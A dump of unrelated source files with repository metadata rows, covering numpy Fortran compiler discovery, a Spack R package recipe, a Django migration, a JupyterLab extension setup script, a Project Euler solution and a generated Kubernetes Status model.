module_name, ext = os.path.splitext(os.path.basename(fname))
module_name = 'numpy.distutils.fcompiler.' + module_name
__import__ (module_name)
module = sys.modules[module_name]
if hasattr(module, 'compilers'):
for cname in module.compilers:
klass = getattr(module, cname)
desc = (klass.compiler_type, klass, klass.description)
fcompiler_class[klass.compiler_type] = desc
for alias in klass.compiler_aliases:
if alias in fcompiler_aliases:
raise ValueError("alias %r defined for both %s and %s"
% (alias, klass.__name__,
fcompiler_aliases[alias][1].__name__))
fcompiler_aliases[alias] = desc
def _find_existing_fcompiler(compiler_types,
osname=None, platform=None,
requiref90=False,
c_compiler=None):
from numpy.distutils.core import get_distribution
dist = get_distribution(always=True)
for compiler_type in compiler_types:
v = None
try:
c = new_fcompiler(plat=platform, compiler=compiler_type,
c_compiler=c_compiler)
c.customize(dist)
v = c.get_version()
if requiref90 and c.compiler_f90 is None:
v = None
new_compiler = c.suggested_f90_compiler
if new_compiler:
log.warn('Trying %r compiler as suggested by %r '
'compiler for f90 support.' % (compiler_type,
new_compiler))
c = new_fcompiler(plat=platform, compiler=new_compiler,
c_compiler=c_compiler)
c.customize(dist)
v = c.get_version()
if v is not None:
compiler_type = new_compiler
if requiref90 and c.compiler_f90 is None:
raise ValueError('%s does not support compiling f90 codes, '
'skipping.' % (c.__class__.__name__))
except DistutilsModuleError:
log.debug("_find_existing_fcompiler: compiler_type='%s' raised DistutilsModuleError", compiler_type)
except CompilerNotFound:
log.debug("_find_existing_fcompiler: compiler_type='%s' not found", compiler_type)
if v is not None:
return compiler_type
return None
def available_fcompilers_for_platform(osname=None, platform=None):
if osname is None:
osname = os.name
if platform is None:
platform = sys.platform
matching_compiler_types = []
for pattern, compiler_type in _default_compilers:
if re.match(pattern, platform) or re.match(pattern, osname):
for ct in compiler_type:
if ct not in matching_compiler_types:
matching_compiler_types.append(ct)
if not matching_compiler_types:
matching_compiler_types.append('gnu')
return matching_compiler_types
def get_default_fcompiler(osname=None, platform=None, requiref90=False,
c_compiler=None):
matching_compiler_types = available_fcompilers_for_platform(osname,
platform)
log.info("get_default_fcompiler: matching types: '%s'",
matching_compiler_types)
compiler_type = _find_existing_fcompiler(matching_compiler_types,
osname=osname,
platform=platform,
requiref90=requiref90,
c_compiler=c_compiler)
return compiler_type
# Flag to avoid rechecking for Fortran compiler every time
failed_fcompilers = set()
def new_fcompiler(plat=None,
compiler=None,
verbose=0,
dry_run=0,
force=0,
requiref90=False,
c_compiler = None):
global failed_fcompilers
fcompiler_key = (plat, compiler)
if fcompiler_key in failed_fcompilers:
return None
load_all_fcompiler_classes()
if plat is None:
plat = os.name
if compiler is None:
compiler = get_default_fcompiler(plat, requiref90=requiref90,
c_compiler=c_compiler)
if compiler in fcompiler_class:
module_name, klass, long_description = fcompiler_class[compiler]
elif compiler in fcompiler_aliases:
module_name, klass, long_description = fcompiler_aliases[compiler]
else:
msg = "don't know how to compile Fortran code on platform '%s'" % plat
if compiler is not None:
msg = msg + " with '%s' compiler." % compiler
msg = msg + " Supported compilers are: %s)" \
% (','.join(fcompiler_class.keys()))
log.warn(msg)
failed_fcompilers.add(fcompiler_key)
return None
compiler = klass(verbose=verbose, dry_run=dry_run, force=force)
compiler.c_compiler = c_compiler
return compiler
def show_fcompilers(dist=None):
if dist is None:
from distutils.dist import Distribution
from numpy.distutils.command.config_compiler import config_fc
dist = Distribution()
dist.script_name = os.path.basename(sys.argv[0])
dist.script_args = ['config_fc'] + sys.argv[1:]
try:
dist.script_args.remove('--help-fcompiler')
except ValueError:
pass
dist.cmdclass['config_fc'] = config_fc
dist.parse_config_files()
dist.parse_command_line()
compilers = []
compilers_na = []
compilers_ni = []
if not fcompiler_class:
load_all_fcompiler_classes()
platform_compilers = available_fcompilers_for_platform()
for compiler in platform_compilers:
v = None
log.set_verbosity(-2)
try:
c = new_fcompiler(compiler=compiler, verbose=dist.verbose)
c.customize(dist)
v = c.get_version()
except (DistutilsModuleError, CompilerNotFound) as e:
log.debug("show_fcompilers: %s not found" % (compiler,))
log.debug(repr(e))
if v is None:
compilers_na.append(("fcompiler="+compiler, None,
fcompiler_class[compiler][2]))
else:
c.dump_properties()
compilers.append(("fcompiler="+compiler, None,
fcompiler_class[compiler][2] + ' (%s)' % v))
compilers_ni = list(set(fcompiler_class.keys()) - set(platform_compilers))
compilers_ni = [("fcompiler="+fc, None, fcompiler_class[fc][2])
for fc in compilers_ni]
compilers.sort()
compilers_na.sort()
compilers_ni.sort()
pretty_printer = FancyGetopt(compilers)
pretty_printer.print_help("Fortran compilers found:")
pretty_printer = FancyGetopt(compilers_na)
pretty_printer.print_help("Compilers available for this "
"platform, but not found:")
if compilers_ni:
pretty_printer = FancyGetopt(compilers_ni)
pretty_printer.print_help("Compilers not available on this platform:")
print("For compiler details, run 'config_fc --verbose' setup command.")
def dummy_fortran_file():
fo, name = make_temp_file(suffix='.f')
fo.write(" subroutine dummy()\n end\n")
fo.close()
return name[:-2]
is_f_file = re.compile(r'.*[.](for|ftn|f77|f)\Z', re.I).match
_has_f_header = re.compile(r'-[*]-\s*fortran\s*-[*]-', re.I).search
_has_f90_header = re.compile(r'-[*]-\s*f90\s*-[*]-', re.I).search
_has_fix_header = re.compile(r'-[*]-\s*fix\s*-[*]-', re.I).search
_free_f90_start = re.compile(r'[^c*!]\s*[^\s\d\t]', re.I).match
def is_free_format(file):
result = 0
f = open_latin1(file, 'r')
line = f.readline()
n = 10000
if _has_f_header(line):
n = 0
elif _has_f90_header(line):
n = 0
result = 1
while n>0 and line:
line = line.rstrip()
if line and line[0]!='!':
n -= 1
if (line[0]!='\t' and _free_f90_start(line[:5])) or line[-1:]=='&':
result = 1
break
line = f.readline()
f.close()
return result
def has_f90_header(src):
f = open_latin1(src, 'r')
line = f.readline()
f.close()
return _has_f90_header(line) or _has_fix_header(line)
_f77flags_re = re.compile(r'(c|)f77flags\s*\(\s*(?P<fcname>\w+)\s*\)\s*=\s*(?P<fflags>.*)', re.I)
def get_f77flags(src):
flags = {}
f = open_latin1(src, 'r')
i = 0
for line in f:
i += 1
if i>20: break
m = _f77flags_re.match(line)
if not m: continue
fcname = m.group('fcname').strip()
fflags = m.group('fflags').strip()
flags[fcname] = split_quoted(fflags)
f.close()
return flags
if __name__ == '__main__':
show_fcompilers()
| true | true |
1c306952397df50dbb1817d16a605050bc049f1c | 1,306 | py | Python | var/spack/repos/builtin/packages/r-selectr/package.py | jonglezb/spack | ebc871abbf8f082000617e1798c75260652f0770 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2 | 2020-09-10T22:50:08.000Z | 2021-01-12T22:18:54.000Z | var/spack/repos/builtin/packages/r-selectr/package.py | jonglezb/spack | ebc871abbf8f082000617e1798c75260652f0770 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 14 | 2021-07-20T01:04:53.000Z | 2022-03-02T01:08:36.000Z | var/spack/repos/builtin/packages/r-selectr/package.py | jonglezb/spack | ebc871abbf8f082000617e1798c75260652f0770 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 1 | 2021-05-06T00:17:46.000Z | 2021-05-06T00:17:46.000Z | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RSelectr(RPackage):
"""Translates a CSS3 selector into an equivalent XPath expression. This
allows us to use CSS selectors when working with the XML package as it
can only evaluate XPath expressions. Also provided are convenience
functions useful for using CSS selectors on XML nodes. This package
is a port of the Python package 'cssselect'
(<https://pythonhosted.org/cssselect/>)."""
homepage = "https://sjp.co.nz/projects/selectr"
url = "https://cloud.r-project.org/src/contrib/selectr_0.3-1.tar.gz"
list_url = "https://cloud.r-project.org/src/contrib/Archive/selectr"
version('0.4-1', sha256='8bd42f167629344e485e586f9b05fed342746132489079084d82133d7b3ee2ca')
version('0.4-0', sha256='40cd51bfe499954b300742c49f92167a68964b974268a7f47ca8864f32020ece')
version('0.3-1', sha256='db4f7ceea4b522a54c3ae7709787b0b7fcf389c5d945c5a278e3625388218949')
depends_on('r@3.0:', type=('build', 'run'))
depends_on('r-stringr', type=('build', 'run'))
depends_on('r-r6', when='@0.4-0:', type=('build', 'run'))
| 46.642857 | 95 | 0.724349 |
from spack import *
class RSelectr(RPackage):
homepage = "https://sjp.co.nz/projects/selectr"
url = "https://cloud.r-project.org/src/contrib/selectr_0.3-1.tar.gz"
list_url = "https://cloud.r-project.org/src/contrib/Archive/selectr"
version('0.4-1', sha256='8bd42f167629344e485e586f9b05fed342746132489079084d82133d7b3ee2ca')
version('0.4-0', sha256='40cd51bfe499954b300742c49f92167a68964b974268a7f47ca8864f32020ece')
version('0.3-1', sha256='db4f7ceea4b522a54c3ae7709787b0b7fcf389c5d945c5a278e3625388218949')
depends_on('r@3.0:', type=('build', 'run'))
depends_on('r-stringr', type=('build', 'run'))
depends_on('r-r6', when='@0.4-0:', type=('build', 'run'))
| true | true |
1c3069de3b057d647ee4bea6dc8db9a995c582b5 | 2,872 | py | Python | hypha/apply/projects/migrations/0025_add_report_models.py | hawkinsw/hypha | a9c46f6e1e1af5d32aef9499a06a065ea3d23d61 | [
"BSD-3-Clause"
] | 20 | 2021-04-08T16:38:49.000Z | 2022-02-09T20:05:57.000Z | hypha/apply/projects/migrations/0025_add_report_models.py | OpenTechFund/WebApp | d6e2bb21a39d1fa7566cb60fe19f372dabfa5f0f | [
"BSD-3-Clause"
] | 1,098 | 2017-12-15T11:23:03.000Z | 2020-01-24T07:58:07.000Z | hypha/apply/projects/migrations/0025_add_report_models.py | OpenTechFund/WebApp | d6e2bb21a39d1fa7566cb60fe19f372dabfa5f0f | [
"BSD-3-Clause"
] | 17 | 2020-02-07T14:55:54.000Z | 2021-04-04T19:32:38.000Z | # Generated by Django 2.1.11 on 2019-10-28 14:15
import django.core.files.storage
from django.db import migrations, models
import django.db.models.deletion
import hypha.apply.projects.models
class Migration(migrations.Migration):
dependencies = [
('application_projects', '0024_allow_no_comments_on_pr'),
]
operations = [
migrations.CreateModel(
name='Report',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('public', models.BooleanField(default=True)),
('end_date', models.DateField()),
('project', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='reports', to='application_projects.Project')),
],
options={
'ordering': ('-end_date',),
},
),
migrations.CreateModel(
name='ReportConfig',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('schedule_start', models.DateField(null=True)),
('occurrence', models.PositiveSmallIntegerField(default=1)),
('frequency', models.CharField(choices=[('week', 'Weeks'), ('month', 'Months')], default='month', max_length=5)),
('project', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='report_config', to='application_projects.Project')),
],
),
migrations.CreateModel(
name='ReportPrivateFiles',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('document', models.FileField(storage=django.core.files.storage.FileSystemStorage(), upload_to=hypha.apply.projects.models.report.report_path)),
],
),
migrations.CreateModel(
name='ReportVersion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('submitted', models.DateTimeField()),
('content', models.TextField()),
('report', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='versions', to='application_projects.Report')),
],
),
migrations.AddField(
model_name='contract',
name='approved_at',
field=models.DateTimeField(null=True),
),
migrations.AddField(
model_name='reportprivatefiles',
name='report',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='files', to='application_projects.ReportVersion'),
),
]
| 44.184615 | 160 | 0.602368 |
import django.core.files.storage
from django.db import migrations, models
import django.db.models.deletion
import hypha.apply.projects.models
class Migration(migrations.Migration):
dependencies = [
('application_projects', '0024_allow_no_comments_on_pr'),
]
operations = [
migrations.CreateModel(
name='Report',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('public', models.BooleanField(default=True)),
('end_date', models.DateField()),
('project', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='reports', to='application_projects.Project')),
],
options={
'ordering': ('-end_date',),
},
),
migrations.CreateModel(
name='ReportConfig',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('schedule_start', models.DateField(null=True)),
('occurrence', models.PositiveSmallIntegerField(default=1)),
('frequency', models.CharField(choices=[('week', 'Weeks'), ('month', 'Months')], default='month', max_length=5)),
('project', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='report_config', to='application_projects.Project')),
],
),
migrations.CreateModel(
name='ReportPrivateFiles',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('document', models.FileField(storage=django.core.files.storage.FileSystemStorage(), upload_to=hypha.apply.projects.models.report.report_path)),
],
),
migrations.CreateModel(
name='ReportVersion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('submitted', models.DateTimeField()),
('content', models.TextField()),
('report', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='versions', to='application_projects.Report')),
],
),
migrations.AddField(
model_name='contract',
name='approved_at',
field=models.DateTimeField(null=True),
),
migrations.AddField(
model_name='reportprivatefiles',
name='report',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='files', to='application_projects.ReportVersion'),
),
]
| true | true |
1c306a25629329ceaeb90ff4a2b64a1d7896121e | 412 | py | Python | pyvista/_version.py | fgallardo-mpie/pyvista | a4f148d3d165648eb871ba45fa39f457377bd10e | [
"MIT"
] | null | null | null | pyvista/_version.py | fgallardo-mpie/pyvista | a4f148d3d165648eb871ba45fa39f457377bd10e | [
"MIT"
] | null | null | null | pyvista/_version.py | fgallardo-mpie/pyvista | a4f148d3d165648eb871ba45fa39f457377bd10e | [
"MIT"
] | null | null | null | """Version info for pyvista.
On the ``master`` branch, use 'dev0' to denote a development version.
For example:
version_info = 0, 27, 'dev0'
---
When generating pre-release wheels, use '0rcN', for example:
version_info = 0, 28, '0rc1'
Denotes the first release candidate.
"""
# major, minor, patch
version_info = 0, 30, 'dev0'
# Nice string for the version
__version__ = '.'.join(map(str, version_info))
| 18.727273 | 69 | 0.699029 |
version_info = 0, 30, 'dev0'
__version__ = '.'.join(map(str, version_info))
| true | true |
1c306bdf12f452cbe3c58a8a04259382429d80d3 | 2,551 | py | Python | setup.py | DerThorsten/jupyterlab-jitsi | 5c2c3a5ea0f15d861373b375633803762254227a | [
"BSD-3-Clause"
] | 3 | 2021-06-24T09:38:33.000Z | 2021-06-25T04:02:22.000Z | setup.py | DerThorsten/jupyterlab-jitsi | 5c2c3a5ea0f15d861373b375633803762254227a | [
"BSD-3-Clause"
] | 1 | 2021-06-30T15:30:20.000Z | 2021-06-30T15:30:20.000Z | setup.py | DerThorsten/jupyterlab-jitsi | 5c2c3a5ea0f15d861373b375633803762254227a | [
"BSD-3-Clause"
] | 1 | 2021-06-29T13:10:35.000Z | 2021-06-29T13:10:35.000Z | """
jupyterlab-jitsi setup
"""
import json
from pathlib import Path
import setuptools
HERE = Path(__file__).parent.resolve()
# The name of the project
name = "jupyterlab-jitsi"
lab_path = (HERE / name.replace("-", "_") / "labextension")
# Representative files that should exist after a successful build
ensured_targets = [
str(lab_path / "package.json"),
str(lab_path / "static/style.js")
]
labext_name = "jupyterlab-jitsi"
data_files_spec = [
("share/jupyter/labextensions/%s" % labext_name, str(lab_path), "**"),
("share/jupyter/labextensions/%s" % labext_name, str(HERE), "install.json"),("etc/jupyter/jupyter_server_config.d",
"jupyter-config/server-config", "jupyterlab-jitsi.json"),
# For backward compatibility with notebook server
("etc/jupyter/jupyter_notebook_config.d",
"jupyter-config/nb-config", "jupyterlab-jitsi.json"),
]
long_description = (HERE / "README.md").read_text()
# Get the package info from package.json
pkg_json = json.loads((HERE / "package.json").read_bytes())
setup_args = dict(
name=name,
version=pkg_json["version"],
url=pkg_json["homepage"],
author=pkg_json["author"]["name"],
author_email=pkg_json["author"]["email"],
description=pkg_json["description"],
license=pkg_json["license"],
long_description=long_description,
long_description_content_type="text/markdown",
packages=setuptools.find_packages(),
install_requires=[
"jupyter_server>=1.6,<2"
],
zip_safe=False,
include_package_data=True,
python_requires=">=3.6",
platforms="Linux, Mac OS X, Windows",
keywords=["Jupyter", "JupyterLab", "JupyterLab3"],
classifiers=[
"License :: OSI Approved :: BSD License",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Framework :: Jupyter",
],
)
try:
from jupyter_packaging import (
wrap_installers,
npm_builder,
get_data_files
)
post_develop = npm_builder(
build_cmd="install:extension", source_dir="src", build_dir=lab_path
)
setup_args['cmdclass'] = wrap_installers(post_develop=post_develop, ensured_targets=ensured_targets)
setup_args['data_files'] = get_data_files(data_files_spec)
except ImportError as e:
pass
if __name__ == "__main__":
setuptools.setup(**setup_args)
| 30.011765 | 119 | 0.675029 | import json
from pathlib import Path
import setuptools
HERE = Path(__file__).parent.resolve()
name = "jupyterlab-jitsi"
lab_path = (HERE / name.replace("-", "_") / "labextension")
ensured_targets = [
str(lab_path / "package.json"),
str(lab_path / "static/style.js")
]
labext_name = "jupyterlab-jitsi"
data_files_spec = [
("share/jupyter/labextensions/%s" % labext_name, str(lab_path), "**"),
("share/jupyter/labextensions/%s" % labext_name, str(HERE), "install.json"),("etc/jupyter/jupyter_server_config.d",
"jupyter-config/server-config", "jupyterlab-jitsi.json"),
("etc/jupyter/jupyter_notebook_config.d",
"jupyter-config/nb-config", "jupyterlab-jitsi.json"),
]
long_description = (HERE / "README.md").read_text()
pkg_json = json.loads((HERE / "package.json").read_bytes())
setup_args = dict(
name=name,
version=pkg_json["version"],
url=pkg_json["homepage"],
author=pkg_json["author"]["name"],
author_email=pkg_json["author"]["email"],
description=pkg_json["description"],
license=pkg_json["license"],
long_description=long_description,
long_description_content_type="text/markdown",
packages=setuptools.find_packages(),
install_requires=[
"jupyter_server>=1.6,<2"
],
zip_safe=False,
include_package_data=True,
python_requires=">=3.6",
platforms="Linux, Mac OS X, Windows",
keywords=["Jupyter", "JupyterLab", "JupyterLab3"],
classifiers=[
"License :: OSI Approved :: BSD License",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Framework :: Jupyter",
],
)
try:
from jupyter_packaging import (
wrap_installers,
npm_builder,
get_data_files
)
post_develop = npm_builder(
build_cmd="install:extension", source_dir="src", build_dir=lab_path
)
setup_args['cmdclass'] = wrap_installers(post_develop=post_develop, ensured_targets=ensured_targets)
setup_args['data_files'] = get_data_files(data_files_spec)
except ImportError as e:
pass
if __name__ == "__main__":
setuptools.setup(**setup_args)
| true | true |
1c306c1652cab9052276bab88d6c156545572736 | 729 | py | Python | pytpp/attributes/tree_root.py | Venafi/pytpp | 42af655b2403b8c9447c86962abd4aaa0201f646 | [
"MIT"
] | 4 | 2022-02-04T23:58:55.000Z | 2022-02-15T18:53:08.000Z | pytpp/attributes/tree_root.py | Venafi/pytpp | 42af655b2403b8c9447c86962abd4aaa0201f646 | [
"MIT"
] | null | null | null | pytpp/attributes/tree_root.py | Venafi/pytpp | 42af655b2403b8c9447c86962abd4aaa0201f646 | [
"MIT"
] | null | null | null | from pytpp.attributes._helper import IterableMeta, Attribute
from pytpp.attributes.top import TopAttributes
class TreeRootAttributes(TopAttributes, metaclass=IterableMeta):
__config_class__ = "Tree Root"
company_name = Attribute('Company Name', min_version='17.3')
migration_task = Attribute('Migration Task')
pendo_eula_version = Attribute('Pendo EULA Version', min_version='19.2')
pendo_optional_data_collection = Attribute('Pendo Optional Data Collection', min_version='19.2')
schema_version = Attribute('Schema Version')
usage_tracking = Attribute('Usage Tracking', min_version='19.2')
use_company_name_for_analytics = Attribute('Use Company Name for Analytics', min_version='17.3')
version = Attribute('Version')
| 48.6 | 97 | 0.798354 | from pytpp.attributes._helper import IterableMeta, Attribute
from pytpp.attributes.top import TopAttributes
class TreeRootAttributes(TopAttributes, metaclass=IterableMeta):
__config_class__ = "Tree Root"
company_name = Attribute('Company Name', min_version='17.3')
migration_task = Attribute('Migration Task')
pendo_eula_version = Attribute('Pendo EULA Version', min_version='19.2')
pendo_optional_data_collection = Attribute('Pendo Optional Data Collection', min_version='19.2')
schema_version = Attribute('Schema Version')
usage_tracking = Attribute('Usage Tracking', min_version='19.2')
use_company_name_for_analytics = Attribute('Use Company Name for Analytics', min_version='17.3')
version = Attribute('Version')
| true | true |
1c306dc858b94ac19e37ef57b49c3a122586b7a6 | 80 | py | Python | nes/bus/devices/apu/sq2_hi.py | Hexadorsimal/pynes | dbb3d40c1240fa27f70fa798bcec09188755eec2 | [
"MIT"
] | 1 | 2017-05-13T18:57:09.000Z | 2017-05-13T18:57:09.000Z | nes/bus/devices/apu/sq2_hi.py | Hexadorsimal/py6502 | dbb3d40c1240fa27f70fa798bcec09188755eec2 | [
"MIT"
] | 7 | 2020-10-24T17:16:56.000Z | 2020-11-01T14:10:23.000Z | nes/bus/devices/apu/sq2_hi.py | Hexadorsimal/pynes | dbb3d40c1240fa27f70fa798bcec09188755eec2 | [
"MIT"
] | null | null | null | from nes.processors.registers import Register
class Sq2Hi(Register):
pass
| 13.333333 | 45 | 0.775 | from nes.processors.registers import Register
class Sq2Hi(Register):
pass
| true | true |
1c306f94d3148cda89763d15d67cfa4057307226 | 47 | py | Python | tests/conftest.py | noirbizarre/umfactory | 263426f415ef71fe27b733846e9331066be49bca | [
"MIT"
] | 2 | 2020-04-02T12:54:13.000Z | 2021-08-25T03:24:11.000Z | tests/conftest.py | noirbizarre/umfactory | 263426f415ef71fe27b733846e9331066be49bca | [
"MIT"
] | 160 | 2018-01-13T15:53:46.000Z | 2022-03-25T11:30:43.000Z | tests/conftest.py | noirbizarre/umfactory | 263426f415ef71fe27b733846e9331066be49bca | [
"MIT"
] | null | null | null | DB_URI = 'mongodb://localhost:27017/umfactory'
| 23.5 | 46 | 0.765957 | DB_URI = 'mongodb://localhost:27017/umfactory'
| true | true |
1c30700c7052f1fc5ab3723e41616a4f3d52e6f6 | 4,212 | py | Python | problem11.py | rentes/Euler | e28b536a15f2e795f886a5df261d38bb0181be07 | [
"MIT"
] | 1 | 2019-05-29T23:54:24.000Z | 2019-05-29T23:54:24.000Z | problem11.py | rentes/Euler | e28b536a15f2e795f886a5df261d38bb0181be07 | [
"MIT"
] | null | null | null | problem11.py | rentes/Euler | e28b536a15f2e795f886a5df261d38bb0181be07 | [
"MIT"
] | null | null | null | """Project Euler - Problem 11 - http://projecteuler.net/problem=11"""
import sys
import time
# please install numpy module (python-numpy on Arch Linux)
import numpy as np
import tools.timeutils as timeutils
def fill_matrix():
"""
Return a numpy matrix from the data in problem11-data.txt
"""
array = []
with open('problem11-data.txt', 'r') as f:
for line in f:
array.append(line.strip())
# this is just a 2d array, not a matrix
matrix_array = np.loadtxt('problem11-data.txt', delimiter=' ')
# this is a matrix
np_matrix = np.bmat(matrix_array)
return np_matrix
def largest_product_horizontally(matrix):
"""
Computes the largest product horizontally (line by line) on a given matrix
"""
largest_product = 1
for line in range(0, matrix.shape[0]):
for column in range(0, matrix.shape[1]-3):
product = int(matrix[line, column] *
matrix[line, column+1] *
matrix[line, column+2] *
matrix[line, column+3])
if product > largest_product:
largest_product = product
return largest_product
def largest_product_vertically(matrix):
"""
Computes the largest product vertically (column by column)
on a given matrix
"""
# rotating the matrix
vertical_matrix = np.rot90(matrix)
return largest_product_horizontally(vertical_matrix)
def largest_product_diagonally(matrix):
"""
Computes the largest product diagonally (NW, NE, SE, SW)
on a given value [x, y]
"""
product_nw = 1
product_ne = 1
product_se = 1
product_sw = 1
largest_product = 1
for line in range(0, matrix.shape[0]):
for column in range(0, matrix.shape[1]):
try:
# NW
product_nw = int(matrix[line, column] *
matrix[line-1, column-1] *
matrix[line-2, column-2] *
matrix[line-3, column-3])
# NE
product_ne = int(matrix[line, column] *
matrix[line-1, column+1] *
matrix[line-2, column+2] *
matrix[line-3, column+3])
# SE
product_se = int(matrix[line, column] *
matrix[line+1, column+1] *
matrix[line+2, column+2] *
matrix[line+3, column+3])
# SW
product_sw = int(matrix[line, column] *
matrix[line+1, column-1] *
matrix[line+2, column-2] *
matrix[line+3, column-3])
except IndexError:
pass
max_product = max(product_nw, product_ne, product_se, product_sw)
if max_product > largest_product:
# update the largest value found
largest_product = max_product
# resetting products for the 4 diagonals
product_nw = 1
product_ne = 1
product_se = 1
product_sw = 1
return largest_product
def main():
"""Main entry point for the script"""
start = time.time()
# create a matrix from the problem data
matrix = fill_matrix()
# compute the largest value from the matrix on a horizontal traversal
value_horizontally = largest_product_horizontally(matrix)
print("horizontally: " + str(value_horizontally))
# compute the largest value from the matrix on a vertical traversal
value_vertically = largest_product_vertically(matrix)
print("vertically: " + str(value_vertically))
# compute the largest value from the matrix on a diagonal traversal
value_diagonally = largest_product_diagonally(matrix)
print("diagonally: " + str(value_diagonally))
print("largest product found is: " +
str(max(value_horizontally, value_vertically, value_diagonally)))
timeutils.elapsed_time(time.time() - start)
if __name__ == '__main__':
sys.exit(main())
| 35.694915 | 78 | 0.566002 | import sys
import time
import numpy as np
import tools.timeutils as timeutils
def fill_matrix():
array = []
with open('problem11-data.txt', 'r') as f:
for line in f:
array.append(line.strip())
matrix_array = np.loadtxt('problem11-data.txt', delimiter=' ')
np_matrix = np.bmat(matrix_array)
return np_matrix
def largest_product_horizontally(matrix):
largest_product = 1
for line in range(0, matrix.shape[0]):
for column in range(0, matrix.shape[1]-3):
product = int(matrix[line, column] *
matrix[line, column+1] *
matrix[line, column+2] *
matrix[line, column+3])
if product > largest_product:
largest_product = product
return largest_product
def largest_product_vertically(matrix):
vertical_matrix = np.rot90(matrix)
return largest_product_horizontally(vertical_matrix)
def largest_product_diagonally(matrix):
product_nw = 1
product_ne = 1
product_se = 1
product_sw = 1
largest_product = 1
for line in range(0, matrix.shape[0]):
for column in range(0, matrix.shape[1]):
try:
product_nw = int(matrix[line, column] *
matrix[line-1, column-1] *
matrix[line-2, column-2] *
matrix[line-3, column-3])
product_ne = int(matrix[line, column] *
matrix[line-1, column+1] *
matrix[line-2, column+2] *
matrix[line-3, column+3])
product_se = int(matrix[line, column] *
matrix[line+1, column+1] *
matrix[line+2, column+2] *
matrix[line+3, column+3])
product_sw = int(matrix[line, column] *
matrix[line+1, column-1] *
matrix[line+2, column-2] *
matrix[line+3, column-3])
except IndexError:
pass
max_product = max(product_nw, product_ne, product_se, product_sw)
if max_product > largest_product:
largest_product = max_product
product_nw = 1
product_ne = 1
product_se = 1
product_sw = 1
return largest_product
def main():
start = time.time()
matrix = fill_matrix()
value_horizontally = largest_product_horizontally(matrix)
print("horizontally: " + str(value_horizontally))
value_vertically = largest_product_vertically(matrix)
print("vertically: " + str(value_vertically))
value_diagonally = largest_product_diagonally(matrix)
print("diagonally: " + str(value_diagonally))
print("largest product found is: " +
str(max(value_horizontally, value_vertically, value_diagonally)))
timeutils.elapsed_time(time.time() - start)
if __name__ == '__main__':
sys.exit(main())
| true | true |
1c307052dc55b95490f16a2d9cd3b8f3a840fa5d | 10,065 | py | Python | kubernetes_asyncio/client/models/v1_status.py | weltonrodrigo/kubernetes_asyncio | b793f3e9ea43cbd0f4ff40ace1b0b677682f4042 | [
"Apache-2.0"
] | null | null | null | kubernetes_asyncio/client/models/v1_status.py | weltonrodrigo/kubernetes_asyncio | b793f3e9ea43cbd0f4ff40ace1b0b677682f4042 | [
"Apache-2.0"
] | 13 | 2021-04-12T02:03:48.000Z | 2022-03-28T02:08:46.000Z | kubernetes_asyncio/client/models/v1_status.py | weltonrodrigo/kubernetes_asyncio | b793f3e9ea43cbd0f4ff40ace1b0b677682f4042 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v1.16.14
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kubernetes_asyncio.client.configuration import Configuration
class V1Status(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'api_version': 'str',
'code': 'int',
'details': 'V1StatusDetails',
'kind': 'str',
'message': 'str',
'metadata': 'V1ListMeta',
'reason': 'str',
'status': 'str'
}
attribute_map = {
'api_version': 'apiVersion',
'code': 'code',
'details': 'details',
'kind': 'kind',
'message': 'message',
'metadata': 'metadata',
'reason': 'reason',
'status': 'status'
}
def __init__(self, api_version=None, code=None, details=None, kind=None, message=None, metadata=None, reason=None, status=None, local_vars_configuration=None): # noqa: E501
"""V1Status - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._api_version = None
self._code = None
self._details = None
self._kind = None
self._message = None
self._metadata = None
self._reason = None
self._status = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
if code is not None:
self.code = code
if details is not None:
self.details = details
if kind is not None:
self.kind = kind
if message is not None:
self.message = message
if metadata is not None:
self.metadata = metadata
if reason is not None:
self.reason = reason
if status is not None:
self.status = status
@property
def api_version(self):
"""Gets the api_version of this V1Status. # noqa: E501
